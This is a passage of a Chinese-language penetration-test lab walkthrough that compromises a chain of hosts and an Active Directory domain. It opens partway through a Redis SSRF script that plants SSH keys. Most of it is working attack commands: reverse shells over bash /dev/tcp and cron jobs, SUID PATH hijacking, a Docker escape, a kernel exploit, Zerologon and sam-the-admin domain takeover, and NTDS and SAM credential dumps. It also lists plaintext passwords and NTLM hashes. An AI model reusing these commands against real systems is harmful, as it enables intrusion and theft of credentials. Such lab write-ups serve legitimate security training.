sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC3BqN5qDTyHTHXplyKfj4S37YzasPh+U5TQIKqY71T3q9gGXdzvx9Sk6DGXcx3AdFY6l40E4e0H0M/vBp0F9MIJMXurTZJpJkvvLgjjaJsTLxtKyTtWzQE7526A5tObMCRmfcvcHViNLgxAQ8xqDcZiH1LJJDBikerPgi9XsziKcEqder1RwDkjvapFGpycm9Z5EezKaicQt64R+cSfBJ0sCaQuKpUWRbi6t4IDyp+Lz2VE3FXgF7ohnXZf/w0CQc/qL0KuMQYhQarIxdEawEqfMzIZRwe+xoYkBreQw3RkMi4COk/9xkiV3BDbP43rzFLhEgtshm5PKTPPmqh42TIK1BMh0FEsy1hQgXa91p/G0g+ONXSJ4CLTnnuFbxeMfbN1TM+kgJmLrl70tJYULmrnm8kBiKaiFT2/pF5EEVtN5Hf77q/bhZpMWs0JNfMJyn1pJeCL66LU6+fWFTmLecT51EDhHc0ogK8eUC29soLkq2HBE8BSg/IR5Mih/c7/lU= kk@Pte-Box\n\n"
filename="authorized_keys"
path="/root/.ssh/"
passwd=""
cmd=["flushall",
"set 1 {}".format(sshpublic_key.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
python2 redis.py获得运行结果,然后 curl ,可以看到有5个OK说明代码顺利执行了:
然后回到 /root/.ssh 文件夹下,用里面的私钥通过ssh直接进行登陆
命令:ssh -i id_rsa root@172.16.10.234
到此,获取到了第一台主机的Shell。上线到msf:
然后将马进行下载,运行上线msf:
三、内网信息收集
3.1 内网网段收集
发现内网网段:192.168.52.0/24
上传fscan进行内网信息收集:
发现内网存活IP:192.168.52.20以及192.168.52.30
MSF添加内网路由:
上线CS:
3.2 配置信息收集
查看该主机nginx配置文件,路径/etc/nginx/conf.d/
发现,外网http://172.16.10.234:81服务是内网http://192.168.52.20:8000进行Nginx反代出来的。
3.3 内网穿透
使用frp进行内网穿透:
frpc.ini配置如下:
[common]
server_addr = 172.16.10.112
server_port = 7077
tls_enable = true
pool_count = 3
[plugin_socks]
type = tcp
remote_port = 7099
plugin = socks5
plugin_user = kk
plugin_passwd = kkyyds
use_encryption = true
use_compression = true
3.4 漏洞挖掘&利用
3.4.1 192.168.52.20Shell
由前边的信息收集发现,内网http://192.168.52.20:8000的web服务即为外网的http://172.16.10.234:81的laravel服务,因此直接连接shell
3.4.1.1 信息收集
发现当前权限为www-data权限,且为docker环境
貌似不出网,利用Ubuntu1中转,反弹shell到192.168.52.10上,监听命令如下:
nc -lvnp 65432
反弹shell命令如下:
bash -c 'exec bash -i &>/dev/tcp/192.168.52.10/65432 <&1'
3.4.1.2 权限提升
查看是否具有SUID权限的文件:
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
发现home/jobs目录下有个shell文件,并且具有SUID权限
cd到/home/jobs目录下,运行一下这个文件,可以看到shell文件执行了ps命令,并且未使用绝对路径,所以我们可以尝试更改$PATH来执行我们的恶意程序,从而获得目标主机的高权限shell。
尝试更改$PATH来执行恶意程序,从而获得目标主机的高权限shell,命令如下:
cd /tmp #因为tmp权限为777
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH # 将/tmp添加到环境变量中,并且先加载执行/tmp里的程序
cd /home/jobs
./shell
发现此时Docker容器权限为root权限,再将root权限的shell反弹过去:
3.4.1.3 Docker特权逃逸
首先查看磁盘文件:fdisk -l
查看设备文件:ls /dev
发现有三个磁盘文件和很多个设备文件,我们将/dev/sda1挂载到自己创建的文件夹,命令如下:
mkdir kkyyds
mount /dev/sda1 /kkyyds
ls /kkyyds
挂载成功,利用计划任务反弹shell,命令如下:
echo '* * * * * bash -i >& /dev/tcp/192.168.52.10/45678 0>&1' >> /kkyyds/var/spool/cron/root
发现并没有弹回去shell,猜想会不会是因为/kkyyds/bin目录下,sh软连接为bash所以没能把shell弹回去,进行ln -s bash sh后再进行反弹,也不行。换一种方法,构造bash脚本,然后在利用计划任务去执行该bash脚本反弹shell,bash脚本内容如下,保存到/kkyyds/tmp/yyds.sh
#!/bin/bash
/bin/bash -i >& bash -i >& /dev/tcp/192.168.62.10/45678 0>&1
接着写入任务计划,sed -i '$a*/2 * * * * root bash /tmp/yyds.sh ' /kkyyds/var/spool/cron/root也反弹失败。
再换一种思路,翻一下看看可不可以访问root目录或查看home有没有用户,利用写入公钥来进行shell。
发现有Ubuntu这个用户,就可以把我们自己生成的SSH密钥写入到/test/home/ubuntu/.ssh目录中的authorized_keys文件中,写入成功之后就可以使用该密钥进行登陆该机器。
cp -avx /kkyyds/home/ubuntu/.ssh/id_rsa.pub /kkyyds/home/ubuntu/.ssh/authorized_keys #-avx是将权限也一起复制
echo > /kkyyds/home/ubuntu/.ssh/authorized_keys #清空authorized_keys文件
echo '生成的.pub文件的内容' > /kkyyds/home/ubuntu/.ssh/authorized_keys #将ssh秘钥写入authorized_keys文件
cat /kkyyds/home/ubuntu/.ssh/authorized_keys #查看是否写入成功
ssh -i id_rsa ubuntu@192.168.52.20
成功拿下ubuntu2普通用户权限。
3.4.1.4 获取Root权限
首先进行信息收集:
发现其出网:
发现内核版本存在CVE-2021-3493提权漏洞,利用该exp进行提权,exp连接:
https://github.com/briskets/CVE-2021-3493
下载后进行编译:
gcc exploit.c -o toroot
利用wget,进行下载:
添加执行权限,运行提权exp:
chmod +x toroot
./toroot
获取到了root权限,上线CS
上线MSF:
发现了一个新的内网网段192.168.93.0/24
3.4.2 192.168.52.30Shell
3.4.2.1 信息收集
发现其开放了通达OA服务:
掏出金大爷的OA-Tools:
3.4.2.2 漏洞利用
存在任意文件上传漏洞,掏出exp就是一把梭:
使用PokeBall链接:
出网,直接上线CS
上线MSF:
发现存在域:whoamianony.org
使用mimikatz抓取密码:
发现两个域用户账密码:
Administratir/Whoami2021
bunny/Bunny2021
四、域攻击
4.1 域信息收集
直接上传fscan一把梭:
发现IP192.168.93.30以及192.168.93.40,且192.168.93.30为DC域控制,二者都有MS17-010漏洞。
4.2 拿下PC2
根据前边的信息搜集,得到两个域内账户。
Administratir/Whoami2021
bunny/Bunny2021
4.2.1 利用SMB传递拿下PC2
上线CS,使用beacon_bind_tcp,生成beaconshell,使用msf上传,运行:
接着使用PC1去进行连接:
portscan 192.168.93.40 4477 none 64
connect 192.168.93.40 4477
做一波信息收集:
4.3 拿下域控DC
4.3.1 内网穿透搭建
因为ubuntu2可以出网,所以使用其搭建一个socks5代理。
frps.ini配置如下:
[common]
server_addr = 172.16.10.112
server_port = 7078
tls_enable = true
pool_count = 3
[plugin_socks]
type = tcp
remote_port = 7098
plugin = socks5
plugin_user = kk
plugin_passwd = kkyyds
use_encryption = true
use_compression = true
4.3.2 方法一:利用psexec传递拿下DC
使用模块exploit/windows/smb/psexec
上线CS,依旧使用:
portscan 192.168.93.30 4422 none 64
connect 192.168.93.30 4422
4.3.3 方法二:Sam-the-admin域内提权
利用域普通用户:bunny/Bunny2021接管域
python3 sam_the_admin.py "whoamianony/bunny:Bunny2021" -dc-ip 192.168.93.30 -shell
4.3.4 方法三:Zerologon域攻击
首先使用POC探测漏洞是否存在:
python3 zerologon_tester.py <dc-hostname> <dc-ip>
python3 zerologon_tester.py DC 192.168.93.30
接着将域控密码置空:
┌[Pte-Box]─[13:21-06/01]─[/home/kk/Desktop/K/Intranet/AD-attack/zerologon]
└╼kk$python3 zer0-exp.py 192.168.93.30
域控账户Administrator账户以及hash如下:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec
获取域内所有用户hash
crackmapexec smb 192.168.93.30 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec --ntds
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6be58bfcc0a164af2408d1d3bd313c2a:::
whoami:1001:aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec:::
whoamianony.org\bunny:1112:aad3b435b51404eeaad3b435b51404ee:cc567d5556030b7356ee4915ff098c8f:::
whoamianony.org\moretz:1115:aad3b435b51404eeaad3b435b51404ee:ba6723567ac2ca8993b098224ac27d90:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:eaeed2d485e814c7563517f521fe132b:::
PC2$:1113:aad3b435b51404eeaad3b435b51404ee:3cc215297c00d523b8442450296315b6:::
SAMTHEADMIN-70$:1603:aad3b435b51404eeaad3b435b51404ee:19fa435c7a2991ee05737ae8cd4d54a2:::
krbtgt:aes256-cts-hmac-sha1-96:77dd8d0b0d436b6df02303f0a5a98d95acda6f84144ea53525bfee5ffda45afb
krbtgt:aes128-cts-hmac-sha1-96:aaeee8cffc1ade3061ce78b89237a7b8
krbtgt:des-cbc-md5:9b3446f829dfbf3e
whoamianony.org\bunny:aes256-cts-hmac-sha1-96:62694713f45b34ebcd0dd2ad5a66ebb20a7245e839b5a2a149d2ab367a703120
whoamianony.org\bunny:aes128-cts-hmac-sha1-96:63064306d5306e43c7c56c7d7ac44d57
whoamianony.org\bunny:des-cbc-md5:8fd6bc2980d5523b
whoamianony.org\moretz:aes256-cts-hmac-sha1-96:854ae083f158747bf98a27b4f32bccfe369c8e3d04c5eb12b14c0e25117dc2cf
whoamianony.org\moretz:aes128-cts-hmac-sha1-96:6630108d408ba8ee70eda87474753a21
whoamianony.org\moretz:des-cbc-md5:4ca849cbda4089c7
DC$:aes256-cts-hmac-sha1-96:15c774ab315995a15debed0aafa7786ea7ae6a6f2666235d56d5e66e054575ef
DC$:aes128-cts-hmac-sha1-96:0f49d34bcd22bfa96ecd819c5f03f7d9
DC$:des-cbc-md5:2c130ba21013dac4
PC2$:aes256-cts-hmac-sha1-96:1e889d833a2cc8594ffefd395245341a25be7ed07c44df7416d04365a1060909
PC2$:aes128-cts-hmac-sha1-96:c7b0dedeaffa4e5d72387d4b8ee4b6b6
PC2$:des-cbc-md5:547c5213527098fb
SAMTHEADMIN-70$:aes256-cts-hmac-sha1-96:cf0710bfddbcb191db71387073d9f70fa4e0ba57ad9f09a952a3ec0bf006286a
SAMTHEADMIN-70$:aes128-cts-hmac-sha1-96:9675c94cd813d825a3090409b0c0bd10
SAMTHEADMIN-70$:des-cbc-md5:16a4893dce574979
利用hash wmic登录域控:
python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ab89b1295e69d353dd7614c7a3a80cec administrator@192.168.93.30
接着运行以下命令导出SAM文件:
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
将域控密码进行恢复,避免脱域:
利用本地解密脚本secretsdump.py对刚刚下载下来的.save文件进行解密,命令如下:
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
使用脚本reinstall_original_pw.py将域控密码进行恢复,不然会导致脱域。
上面解出来的$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:eaeed2d485e814c7563517f521fe132b
用于下面的恢复脚本进行恢复,hash只需要后半部分即可。
python3 reinstall_original_pw.py DC 192.168.93.30 eaeed2d485e814c7563517f521fe132b
最后,验证一下恢复结果,使用如下命令:
python3 secretsdump.py whoamianony.org/DC$@192.168.93.30 -just-dc -no-pass
python3 secretsdump.py whoamianony.org/DC$@192.168.93.30 -no-pass # 四个空格
五、打完收工
免责声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !
应该没人会转载。。。
